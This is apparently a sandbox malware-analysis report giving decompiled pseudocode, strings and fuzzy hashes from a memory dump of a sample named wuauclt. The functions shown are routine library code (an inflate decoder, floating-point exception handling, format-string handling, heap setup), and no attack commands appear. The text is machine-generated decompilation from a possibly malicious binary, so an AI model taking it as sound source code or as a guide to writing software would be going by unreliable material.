                                                						_t155 = _t155;
                                                						 *(_t331 + 0x28) = 0;
                                                						if((_t173 & 0x00000010) != 0) {
                                                							L12:
                                                							_t178 = _t173 & 0x0000000f;
                                                							_t161 = _t155 - _t178;
                                                							 *(_t331 + 0x2c) = ( *(0x2723c8 + _t178 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
                                                							_t273 = _t270 >> _t178;
                                                							if(_t161 < 0xf) {
                                                								do {
                                                									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
                                                									_t309 = 0 << _t161;
                                                									_t161 = _t161 + 8;
                                                									_t273 = _t273 | _t309;
                                                									_t316 = _t316 + 1;
                                                								} while (_t161 < 0xf);
                                                								 *((intOrPtr*)(_t331 + 0x18)) = _t316;
                                                							}
                                                							_t290 =  *((intOrPtr*)(_t331 + 0x34));
                                                							_t235 =  *(_t331 + 0x20) & _t273;
                                                							_t180 =  *((intOrPtr*)(_t290 + _t235 * 8));
                                                							_t291 = _t290 + _t235 * 8;
                                                							_t270 = _t273 >>  *(_t291 + 1);
                                                							_t155 = _t161;
                                                							 *(_t331 + 0x28) = 0;
                                                							if((_t180 & 0x00000010) != 0) {
                                                								L18:
                                                								_t181 = _t180 & 0x0000000f;
                                                								while(_t155 < _t181) {
                                                									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
                                                									_t323 = 0 << _t155;
                                                									_t155 = _t155 + 8;
                                                									_t270 = _t270 | _t323;
                                                									_t316 =  *((intOrPtr*)(_t331 + 0x18)) + 1;
                                                									 *((intOrPtr*)(_t331 + 0x18)) =  *((intOrPtr*)(_t331 + 0x18)) + 1;
                                                								}
                                                								_t320 = ( *(0x2723c8 + _t181 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
                                                								_t270 = _t270 >> _t181;
                                                								_t240 =  *(_t331 + 0x2c);
                                                								_t155 = _t155 - _t181;
                                                								 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - _t240;
                                                								_t295 = _t279 - _t320;
                                                								_t321 =  *((intOrPtr*)(_t331 + 0x38));
                                                								_t182 =  *((intOrPtr*)(_t321 + 0x28));
                                                								if(_t295 >= _t182) {
                                                									 *_t279 =  *_t295;
                                                									_t280 = _t279 + 1;
                                                									 *_t280 =  *((intOrPtr*)(_t295 + 1));
                                                									_t281 = _t280 + 1;
                                                									_t297 = _t295 + 2;
                                                									_t241 = _t240 - 2;
                                                									do {
                                                										 *_t281 =  *_t297;
                                                										_t281 = _t281 + 1;
                                                										_t297 = _t297 + 1;
                                                										_t241 = _t241 - 1;
                                                									} while (_t241 != 0);
                                                									_t316 =  *((intOrPtr*)(_t331 + 0x18));
                                                								} else {
                                                									_t327 =  *(_t321 + 0x2c);
                                                									 *(_t331 + 0x28) = _t327;
                                                									_t328 = _t327 - _t182;
                                                									do {
                                                										_t295 = _t295 + _t328;
                                                									} while (_t295 < _t182);
                                                									_t330 =  *(_t331 + 0x28) - _t295;
                                                									if(_t240 <= _t330) {
                                                										 *_t279 =  *_t295;
                                                										_t282 = _t279 + 1;
                                                										 *_t282 =  *((intOrPtr*)(_t295 + 1));
                                                										_t283 = _t282 + 1;
                                                										_t299 = _t295 + 2;
                                                										_t242 = _t240 - 2;
                                                										do {
                                                											 *_t283 =  *_t299;
                                                											_t283 = _t283 + 1;
                                                											_t299 = _t299 + 1;
                                                											_t242 = _t242 - 1;
                                                										} while (_t242 != 0);
                                                										_t316 =  *((intOrPtr*)(_t331 + 0x18));
                                                									} else {
                                                										_t243 = _t240 - _t330;
                                                										do {
                                                											 *_t279 =  *_t295;
                                                											_t279 = _t279 + 1;
                                                											_t295 = _t295 + 1;
                                                											_t330 = _t330 - 1;
                                                										} while (_t330 != 0);
                                                										_t301 =  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x38)) + 0x28));
                                                										do {
                                                											 *_t279 =  *_t301;
                                                											_t279 = _t279 + 1;
                                                											_t301 = _t301 + 1;
                                                											_t243 = _t243 - 1;
                                                										} while (_t243 != 0);
                                                										_t316 =  *((intOrPtr*)(_t331 + 0x18));
                                                									}
                                                								}
                                                								L36:
                                                								if( *((intOrPtr*)(_t331 + 0x14)) < 0x102 ||  *((intOrPtr*)(_t331 + 0x10)) < 0xa) {
                                                									_t287 =  *((intOrPtr*)(_t331 + 0x3c));
                                                									_t219 =  *((intOrPtr*)(_t287 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                                									_t176 = _t155 >> 3;
                                                									if(_t176 < _t219) {
                                                										_t219 = _t176;
                                                									}
                                                									_t177 =  *((intOrPtr*)(_t331 + 0x38));
                                                									_t317 = _t316 - _t219;
                                                									 *(_t177 + 0x20) = _t270;
                                                									 *((intOrPtr*)(_t177 + 0x1c)) = _t155 - _t219 * 8;
                                                									 *((intOrPtr*)(_t287 + 4)) = _t219 +  *((intOrPtr*)(_t331 + 0x10));
                                                									 *_t287 = _t317;
                                                									 *((intOrPtr*)(_t287 + 8)) =  *((intOrPtr*)(_t287 + 8)) + _t317 -  *_t287;
                                                									 *((intOrPtr*)(_t177 + 0x34)) = _t279;
                                                									return 0;
                                                								} else {
                                                									continue;
                                                								}
                                                							} else {
                                                								while((_t180 & 0x00000040) == 0) {
                                                									_t252 = ( *(0x2723c8 + _t180 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
                                                									_t180 =  *((intOrPtr*)(_t291 + _t252 * 8));
                                                									_t291 = _t291 + _t252 * 8;
                                                									_t270 = _t270 >>  *(_t291 + 1);
                                                									_t155 = _t155;
                                                									 *(_t331 + 0x28) = 0;
                                                									if((_t180 & 0x00000010) == 0) {
                                                										continue;
                                                									} else {
                                                										goto L18;
                                                									}
                                                									goto L51;
                                                								}
                                                								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
                                                								 *(_t249 + 0x18) = "invalid distance code";
                                                								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                                								_t305 = _t155 >> 3;
                                                								if(_t305 >=  *(_t331 + 0x2c)) {
                                                									goto L49;
                                                								}
                                                								goto L50;
                                                							}
                                                						} else {
                                                							while((_t173 & 0x00000040) == 0) {
                                                								_t267 = ( *(0x2723c8 + _t173 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
                                                								_t173 =  *((intOrPtr*)(_t286 + _t267 * 8));
                                                								_t286 = _t286 + _t267 * 8;
                                                								if(0 == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t270 = _t270 >>  *(_t286 + 1);
                                                									_t155 = _t155;
                                                									 *(_t331 + 0x28) = 0;
                                                									if((_t173 & 0x00000010) == 0) {
                                                										continue;
                                                									} else {
                                                										goto L12;
                                                									}
                                                								}
                                                								goto L51;
                                                							}
                                                							if((_t173 & 0x00000020) == 0) {
                                                								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
                                                								 *(_t249 + 0x18) = "invalid literal/length code";
                                                								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                                								_t305 = _t155 >> 3;
                                                								if(_t305 >=  *(_t331 + 0x2c)) {
                                                									L49:
                                                									_t305 =  *(_t331 + 0x2c);
                                                								}
                                                								L50:
                                                								_t193 =  *((intOrPtr*)(_t331 + 0x38));
                                                								_t325 = _t316 - _t305;
                                                								 *(_t193 + 0x20) = _t270;
                                                								 *((intOrPtr*)(_t193 + 0x1c)) = _t155 - _t305 * 8;
                                                								 *((intOrPtr*)(_t249 + 4)) = _t305 +  *((intOrPtr*)(_t331 + 0x10));
                                                								 *_t249 = _t325;
                                                								 *((intOrPtr*)(_t249 + 8)) =  *((intOrPtr*)(_t249 + 8)) + _t325 -  *_t249;
                                                								 *((intOrPtr*)(_t193 + 0x34)) = _t281;
                                                								return 0xfffffffd;
                                                							} else {
                                                								_t313 =  *((intOrPtr*)(_t331 + 0x3c));
                                                								_t261 =  *((intOrPtr*)(_t313 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                                								_t200 = _t155 >> 3;
                                                								if(_t200 < _t261) {
                                                									_t261 = _t200;
                                                								}
                                                								_t201 =  *((intOrPtr*)(_t331 + 0x38));
                                                								_t326 = _t316 - _t261;
                                                								 *(_t201 + 0x20) = _t270;
                                                								 *((intOrPtr*)(_t201 + 0x1c)) = _t155 - _t261 * 8;
                                                								 *((intOrPtr*)(_t313 + 4)) = _t261 +  *((intOrPtr*)(_t331 + 0x10));
                                                								 *_t313 = _t326;
                                                								 *((intOrPtr*)(_t313 + 8)) =  *((intOrPtr*)(_t313 + 8)) + _t326 -  *_t313;
                                                								 *((intOrPtr*)(_t201 + 0x34)) = _t281;
                                                								return 1;
                                                							}
                                                						}
                                                					}
                                                					L51:
                                                				}
                                                 			}

                                                Strings
                                                • invalid literal/length code, xrefs: 00253A5A
                                                • invalid distance code, xrefs: 0025397E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: invalid distance code$invalid literal/length code
                                                • API String ID: 0-1393003055
                                                • Opcode ID: dfcecbe77876db2b95983f1219045aa8d42e0c68885754db6c5709ad2d12fb54
                                                • Instruction ID: e918c653d758a635eba99cb8af926c08c84e7ab420ed12ad000a4ab06df90bc4
                                                • Opcode Fuzzy Hash: dfcecbe77876db2b95983f1219045aa8d42e0c68885754db6c5709ad2d12fb54
                                                • Instruction Fuzzy Hash: 5FD1D5756183428FCB18CF2CD49026AFBE1EB99350F185A6DECDA93341C770E959CB89
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00266D3C(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                				signed int _t172;
                                                				signed int _t175;
                                                				signed int _t178;
                                                				signed int* _t179;
                                                				signed int _t195;
                                                				signed int _t199;
                                                				signed int _t202;
                                                				void* _t203;
                                                				void* _t206;
                                                				signed int _t209;
                                                				void* _t210;
                                                				signed int _t225;
                                                				unsigned int* _t240;
                                                				signed char _t242;
                                                				signed int* _t250;
                                                				unsigned int* _t256;
                                                				signed int* _t257;
                                                				signed char _t259;
                                                				long _t262;
                                                				signed int* _t265;
                                                
                                                				 *(_a4 + 4) = 0;
                                                				_t262 = 0xc000000d;
                                                				 *(_a4 + 8) = 0;
                                                				 *(_a4 + 0xc) = 0;
                                                				_t242 = _a12;
                                                				if((_t242 & 0x00000010) != 0) {
                                                					_t262 = 0xc000008f;
                                                					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                				}
                                                				if((_t242 & 0x00000002) != 0) {
                                                					_t262 = 0xc0000093;
                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                				}
                                                				if((_t242 & 0x00000001) != 0) {
                                                					_t262 = 0xc0000091;
                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                				}
                                                				if((_t242 & 0x00000004) != 0) {
                                                					_t262 = 0xc000008e;
                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                				}
                                                				if((_t242 & 0x00000008) != 0) {
                                                					_t262 = 0xc0000090;
                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                				}
                                                				_t265 = _a8;
                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                                				_t259 = E00264CA2(_a4);
                                                				if((_t259 & 0x00000001) != 0) {
                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                				}
                                                				if((_t259 & 0x00000004) != 0) {
                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                				}
                                                				if((_t259 & 0x00000008) != 0) {
                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                				}
                                                				if((_t259 & 0x00000010) != 0) {
                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                				}
                                                				if((_t259 & 0x00000020) != 0) {
                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                				}
                                                				_t172 =  *_t265 & 0x00000c00;
                                                				if(_t172 == 0) {
                                                					 *_a4 =  *_a4 & 0xfffffffc;
                                                				} else {
                                                					if(_t172 == 0x400) {
                                                						_t257 = _a4;
                                                						_t225 =  *_t257 & 0xfffffffd | 1;
                                                						L26:
                                                						 *_t257 = _t225;
                                                						L29:
                                                						_t175 =  *_t265 & 0x00000300;
                                                						if(_t175 == 0) {
                                                							_t250 = _a4;
                                                							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                                							L35:
                                                							 *_t250 = _t178;
                                                							L36:
                                                							_t179 = _a4;
                                                							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                							if(_a28 == 0) {
                                                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                								_t254 = _a4;
                                                								_t240 = _a24;
                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                								 *(_a4 + 0x50) =  *_t240;
                                                							} else {
                                                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                								_t240 = _a24;
                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                								 *(_a4 + 0x50) =  *_t240;
                                                							}
                                                							E00264C08(_t254);
                                                							RaiseException(_t262, 0, 1,  &_a4);
                                                							_t256 = _a4;
                                                							if((_t256[2] & 0x00000010) != 0) {
                                                								 *_t265 =  *_t265 & 0xfffffffe;
                                                							}
                                                							if((_t256[2] & 0x00000008) != 0) {
                                                								 *_t265 =  *_t265 & 0xfffffffb;
                                                							}
                                                							if((_t256[2] & 0x00000004) != 0) {
                                                								 *_t265 =  *_t265 & 0xfffffff7;
                                                							}
                                                							if((_t256[2] & 0x00000002) != 0) {
                                                								 *_t265 =  *_t265 & 0xffffffef;
                                                							}
                                                							if((_t256[2] & 0x00000001) != 0) {
                                                								 *_t265 =  *_t265 & 0xffffffdf;
                                                							}
                                                							_t195 =  *_t256 & 0x00000003;
                                                							if(_t195 == 0) {
                                                								 *_t265 =  *_t265 & 0xfffff3ff;
                                                							} else {
                                                								_t206 = _t195 - 1;
                                                								if(_t206 == 0) {
                                                									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                                									L55:
                                                									 *_t265 = _t209;
                                                									L58:
                                                									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                                									if(_t199 == 0) {
                                                										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                                										L64:
                                                										 *_t265 = _t202;
                                                										L65:
                                                										if(_a28 == 0) {
                                                											 *_t240 = _t256[0x14];
                                                										} else {
                                                											 *_t240 = _t256[0x14];
                                                										}
                                                										return _t202;
                                                									}
                                                									_t203 = _t199 - 1;
                                                									if(_t203 == 0) {
                                                										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                                										goto L64;
                                                									}
                                                									_t202 = _t203 - 1;
                                                									if(_t202 == 0) {
                                                										 *_t265 =  *_t265 & 0xfffff3ff;
                                                									}
                                                									goto L65;
                                                								}
                                                								_t210 = _t206 - 1;
                                                								if(_t210 == 0) {
                                                									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                                									goto L55;
                                                								}
                                                								if(_t210 == 1) {
                                                									 *_t265 =  *_t265 | 0x00000c00;
                                                								}
                                                							}
                                                							goto L58;
                                                						}
                                                						if(_t175 == 0x200) {
                                                							_t250 = _a4;
                                                							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                                							goto L35;
                                                						}
                                                						if(_t175 == 0x300) {
                                                							 *_a4 =  *_a4 & 0xffffffe3;
                                                						}
                                                						goto L36;
                                                					}
                                                					if(_t172 == 0x800) {
                                                						_t257 = _a4;
                                                						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                                						goto L26;
                                                					}
                                                					if(_t172 == 0xc00) {
                                                						 *_a4 =  *_a4 | 0x00000003;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00266D37,?,?,00000008,?,?,002669D7,00000000), ref: 00266F69
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 82e542a26e7a01a6a09ef54bffc42b25a6d8f1d951c63aa2fe6da9fe82aa8dd3
                                                • Instruction ID: 8debd7cff4e8eb63474ae9cc7a547080f1642c6a1fe34fdad9ced91afb7f0b5b
                                                • Opcode Fuzzy Hash: 82e542a26e7a01a6a09ef54bffc42b25a6d8f1d951c63aa2fe6da9fe82aa8dd3
                                                • Instruction Fuzzy Hash: EFB17E35220609DFD715CF28C48AB657BE0FF45364F25865CE89ACF2A1C336E9A1CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E0025AF52(void* __ecx) {
                                                				char _v6;
                                                				char _v8;
                                                				void* __ebx;
                                                				void* __edi;
                                                				char _t49;
                                                				signed int _t50;
                                                				void* _t51;
                                                				signed char _t54;
                                                				signed char _t56;
                                                				signed int _t57;
                                                				signed int _t58;
                                                				signed char _t67;
                                                				signed char _t69;
                                                				signed char _t71;
                                                				signed char _t80;
                                                				signed char _t82;
                                                				signed int _t84;
                                                				signed int _t86;
                                                				signed int _t87;
                                                				signed char _t92;
                                                				void* _t95;
                                                				intOrPtr _t100;
                                                				unsigned int _t102;
                                                				signed char _t104;
                                                				void* _t112;
                                                				unsigned int _t113;
                                                				void* _t114;
                                                				signed int _t115;
                                                				signed int* _t116;
                                                				void* _t119;
                                                				void* _t121;
                                                				void* _t122;
                                                				void* _t124;
                                                				void* _t125;
                                                
                                                				_push(__ecx);
                                                				_t119 = __ecx;
                                                				_t92 = 1;
                                                				_t49 =  *((char*)(__ecx + 0x31));
                                                				_t124 = _t49 - 0x64;
                                                				if(_t124 > 0) {
                                                					__eflags = _t49 - 0x70;
                                                					if(__eflags > 0) {
                                                						_t50 = _t49 - 0x73;
                                                						__eflags = _t50;
                                                						if(_t50 == 0) {
                                                							L9:
                                                							_t51 = E0025B64A(_t119);
                                                							L10:
                                                							if(_t51 != 0) {
                                                								__eflags =  *((char*)(_t119 + 0x30));
                                                								if( *((char*)(_t119 + 0x30)) == 0) {
                                                									_t113 =  *(_t119 + 0x20);
                                                									_push(_t114);
                                                									_v8 = 0;
                                                									_t115 = 0;
                                                									_v6 = 0;
                                                									_t54 = _t113 >> 4;
                                                									__eflags = _t92 & _t54;
                                                									if((_t92 & _t54) == 0) {
                                                										L46:
                                                										_t100 =  *((intOrPtr*)(_t119 + 0x31));
                                                										__eflags = _t100 - 0x78;
                                                										if(_t100 == 0x78) {
                                                											L48:
                                                											_t56 = _t113 >> 5;
                                                											__eflags = _t92 & _t56;
                                                											if((_t92 & _t56) != 0) {
                                                												L50:
                                                												__eflags = _t100 - 0x61;
                                                												if(_t100 == 0x61) {
                                                													L53:
                                                													_t57 = 1;
                                                													L54:
                                                													__eflags = _t92;
                                                													if(_t92 != 0) {
                                                														L56:
                                                														 *((char*)(_t121 + _t115 - 4)) = 0x30;
                                                														__eflags = _t100 - 0x58;
                                                														if(_t100 == 0x58) {
                                                															L59:
                                                															_t58 = 1;
                                                															L60:
                                                															__eflags = _t58;
                                                															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                                                															_t115 = _t115 + 2;
                                                															__eflags = _t115;
                                                															L61:
                                                															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
                                                															__eflags = _t113 & 0x0000000c;
                                                															if((_t113 & 0x0000000c) == 0) {
                                                																E0025A8D8(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
                                                																_t122 = _t122 + 0x10;
                                                															}
                                                															E0025B7C1(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
                                                															_t102 =  *(_t119 + 0x20);
                                                															_t116 = _t119 + 0x18;
                                                															_t67 = _t102 >> 3;
                                                															__eflags = _t67 & 0x00000001;
                                                															if((_t67 & 0x00000001) != 0) {
                                                																_t104 = _t102 >> 2;
                                                																__eflags = _t104 & 0x00000001;
                                                																if((_t104 & 0x00000001) == 0) {
                                                																	E0025A8D8(_t119 + 0x448, 0x30, _t95, _t116);
                                                																	_t122 = _t122 + 0x10;
                                                																}
                                                															}
                                                															E0025B71A(_t95, _t119, _t116, 0);
                                                															__eflags =  *_t116;
                                                															if( *_t116 >= 0) {
                                                																_t71 =  *(_t119 + 0x20) >> 2;
                                                																__eflags = _t71 & 0x00000001;
                                                																if((_t71 & 0x00000001) != 0) {
                                                																	E0025A8D8(_t119 + 0x448, 0x20, _t95, _t116);
                                                																}
                                                															}
                                                															_t69 = 1;
                                                															L70:
                                                															return _t69;
                                                														}
                                                														__eflags = _t100 - 0x41;
                                                														if(_t100 == 0x41) {
                                                															goto L59;
                                                														}
                                                														_t58 = 0;
                                                														goto L60;
                                                													}
                                                													__eflags = _t57;
                                                													if(_t57 == 0) {
                                                														goto L61;
                                                													}
                                                													goto L56;
                                                												}
                                                												__eflags = _t100 - 0x41;
                                                												if(_t100 == 0x41) {
                                                													goto L53;
                                                												}
                                                												_t57 = 0;
                                                												goto L54;
                                                											}
                                                											L49:
                                                											_t92 = 0;
                                                											__eflags = 0;
                                                											goto L50;
                                                										}
                                                										__eflags = _t100 - 0x58;
                                                										if(_t100 != 0x58) {
                                                											goto L49;
                                                										}
                                                										goto L48;
                                                									}
                                                									_t80 = _t113 >> 6;
                                                									__eflags = _t92 & _t80;
                                                									if((_t92 & _t80) == 0) {
                                                										__eflags = _t92 & _t113;
                                                										if((_t92 & _t113) == 0) {
                                                											_t82 = _t113 >> 1;
                                                											__eflags = _t92 & _t82;
                                                											if((_t92 & _t82) == 0) {
                                                												goto L46;
                                                											}
                                                											_v8 = 0x20;
                                                											L45:
                                                											_t115 = _t92;
                                                											goto L46;
                                                										}
                                                										_v8 = 0x2b;
                                                										goto L45;
                                                									}
                                                									_v8 = 0x2d;
                                                									goto L45;
                                                								}
                                                								_t69 = _t92;
                                                								goto L70;
                                                							}
                                                							L11:
                                                							_t69 = 0;
                                                							goto L70;
                                                						}
                                                						_t84 = _t50;
                                                						__eflags = _t84;
                                                						if(__eflags == 0) {
                                                							L28:
                                                							_push(0);
                                                							_push(0xa);
                                                							L29:
                                                							_t51 = E0025B455(_t119, _t114, __eflags);
                                                							goto L10;
                                                						}
                                                						__eflags = _t84 - 3;
                                                						if(__eflags != 0) {
                                                							goto L11;
                                                						}
                                                						_push(0);
                                                						L13:
                                                						_push(0x10);
                                                						goto L29;
                                                					}
                                                					if(__eflags == 0) {
                                                						_t51 = E0025B632(__ecx);
                                                						goto L10;
                                                					}
                                                					__eflags = _t49 - 0x67;
                                                					if(_t49 <= 0x67) {
                                                						L30:
                                                						_t51 = E0025B26B(_t92, _t119, _t112);
                                                						goto L10;
                                                					}
                                                					__eflags = _t49 - 0x69;
                                                					if(_t49 == 0x69) {
                                                						L27:
                                                						_t2 = _t119 + 0x20;
                                                						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
                                                						__eflags =  *_t2;
                                                						goto L28;
                                                					}
                                                					__eflags = _t49 - 0x6e;
                                                					if(_t49 == 0x6e) {
                                                						_t51 = E0025B59F(__ecx, _t112);
                                                						goto L10;
                                                					}
                                                					__eflags = _t49 - 0x6f;
                                                					if(_t49 != 0x6f) {
                                                						goto L11;
                                                					}
                                                					_t51 = E0025B613(__ecx);
                                                					goto L10;
                                                				}
                                                				if(_t124 == 0) {
                                                					goto L27;
                                                				}
                                                				_t125 = _t49 - 0x58;
                                                				if(_t125 > 0) {
                                                					_t86 = _t49 - 0x5a;
                                                					__eflags = _t86;
                                                					if(_t86 == 0) {
                                                						_t51 = E0025B208(__ecx);
                                                						goto L10;
                                                					}
                                                					_t87 = _t86 - 7;
                                                					__eflags = _t87;
                                                					if(_t87 == 0) {
                                                						goto L30;
                                                					}
                                                					__eflags = _t87;
                                                					if(__eflags != 0) {
                                                						goto L11;
                                                					}
                                                					L17:
                                                					_t51 = E0025B3C5(_t92, _t119, __eflags, 0);
                                                					goto L10;
                                                				}
                                                				if(_t125 == 0) {
                                                					_push(1);
                                                					goto L13;
                                                				}
                                                				if(_t49 == 0x41) {
                                                					goto L30;
                                                				}
                                                				if(_t49 == 0x43) {
                                                					goto L17;
                                                				}
                                                				if(_t49 <= 0x44) {
                                                					goto L11;
                                                				}
                                                				if(_t49 <= 0x47) {
                                                					goto L30;
                                                				}
                                                				if(_t49 != 0x53) {
                                                					goto L11;
                                                				}
                                                				goto L9;
                                                			}






































                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: f8a09bf90652abba03e4c4632af07912c1671ed9223366bd2e24022b032d3914
                                                • Instruction ID: 954476099f513b9c5b2a64adde7f348d93d6dac353dcb397586b3039f0627ddf
                                                • Opcode Fuzzy Hash: f8a09bf90652abba03e4c4632af07912c1671ed9223366bd2e24022b032d3914
                                                • Instruction Fuzzy Hash: 275199A0630A466ADB3B4D288467BBF23859B41303F040A09EC52C7AC2D772DD3D835F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0026127C() {
                                                				signed int _t3;
                                                
                                                				_t3 = GetProcessHeap();
                                                				 *0x273f10 = _t3;
                                                				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                			}




                                                0x0026127c
                                                0x00261284
                                                0x0026128c

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: c3dbe67e562f5eebf6d9fb5824bd4f16f704dcc76a2f74d5967e2d2692c727d2
                                                • Instruction ID: b109d75ec1e38021ce865a65b35df87bb322bc641e5da5a7d86a8c76f06c9acd
